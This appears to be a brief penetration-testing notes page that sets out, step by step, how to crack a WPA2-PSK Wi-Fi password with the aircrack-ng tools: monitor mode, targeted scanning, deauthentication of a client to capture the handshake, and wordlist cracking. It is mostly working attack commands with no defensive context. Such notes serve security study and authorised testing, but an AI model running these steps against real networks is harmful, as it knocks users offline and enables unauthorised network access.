wifi
This method can be use to crack WPA2-PSK that utilizes a pre-shared-key for authentication.
Methodology
Step1: start adapter on monitor mode
Adapter check:
iwconfig
Kill active process:
airmon-ng check kill
Start adapter on monitor mode:
airmon-ng start wlan0
Start basic scan:
airodump-ng INTERFACE
Note down BSSID, CHANNEL, ESSID
Step2: start attack
start focussed scan:
airodump-ng INTERFACE -c CHANNEL --bssid BSSID [-w FILE]
Should see traffic being recorded. Our aim is to capture a connection.
Send DeAuth:
aireplay-ng INTERFACE -0 1 [-c STATION-TO-DEAUTH]
-0 1
means to deauth once.
Capture the connection
Step3: Cracking
aircrack-ng FILE -b BSSID -w WORDLIST
Last updated